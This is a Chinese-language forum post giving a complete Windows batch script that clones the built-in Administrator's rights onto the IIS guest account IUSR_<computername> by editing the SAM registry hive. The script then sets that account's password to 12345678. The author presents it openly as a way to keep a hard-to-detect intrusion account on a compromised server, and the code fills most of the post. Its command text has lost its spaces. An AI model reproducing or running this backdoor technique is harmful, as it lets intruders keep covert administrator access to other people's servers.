复制并真正隐藏administrator帐号(完全批处理)

[复制链接]
查看277 | 回复0 | 2012-4-1 19:23:56 | 显示全部楼层 |阅读模式
网上看了很多复制administator权限帐号的方法或者工具,比如建立admin$,所谓的隐藏帐号。
并复制administrator的权限。
其实这是暂时、一次性隐藏而已,服务器重启一下通过“计算机管理”或者netuser
都能看到的。
本批处理根据服务器的情况,结合自己的研究,使用服务器本地iis帐号IUSR_计算机名,
设置密码位12345678(可以自己改一下批处理最后一行)。
这个来复制administrator权限,难以发现与引起怀疑。
(当然其他帐号也可以,用这个帐号主要通过机器名就能知道自己想要的入侵帐号密码是多少)
==================
echooff

setlocalenabledelayedexpansion

echo%computername%

echoHKEY_LOCAL_MACHINE\SAM\SAM[117]>”%windir%\..\1.reg”

regini“%windir%\..\1.reg”

regedit/e“%windir%\..\1.reg”HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%

remunicode->ascii

type“%windir%\..\1.reg”>”%windir%\..\2.reg”

del/q“%windir%\..\1.reg”

remfindIUSR_%computername%的对应id

for/F“delims=(tokens=1-5*skip=3″%%ain(%windir%\..\2.reg)dosetiusr_id=%%b

del/q“%windir%\..\2.reg”

remexportadministratorregister

regedit/e“%windir%\..\1.reg”HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

type“%windir%\..\1.reg”>”%windir%\..\2.reg”

del/q“%windir%\..\1.reg”

remreplace1fx->iusr_id

for/f“tokens=*delims=:”%%iin(%windir%\..\2.reg)do(

for/f“tokens=*”%%jin(“%%i”)do(

setTMP=%%j

set“TMP=!TMP:000001F4=00000%iusr_id:~0,3%!”

echo!TMP!>>%windir%\..\1.reg

)

)

regedit/s%windir%\..\1.reg

del/q%windir%\..\1.reg

del/q%windir%\..\2.reg

echoHKEY_LOCAL_MACHINE\SAM\SAM[17]>”%windir%\..\1.reg”

regini“%windir%\..\1.reg”

del/q“%windir%\..\1.reg”

netuserIUSR_%computername%12345678

 
 
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则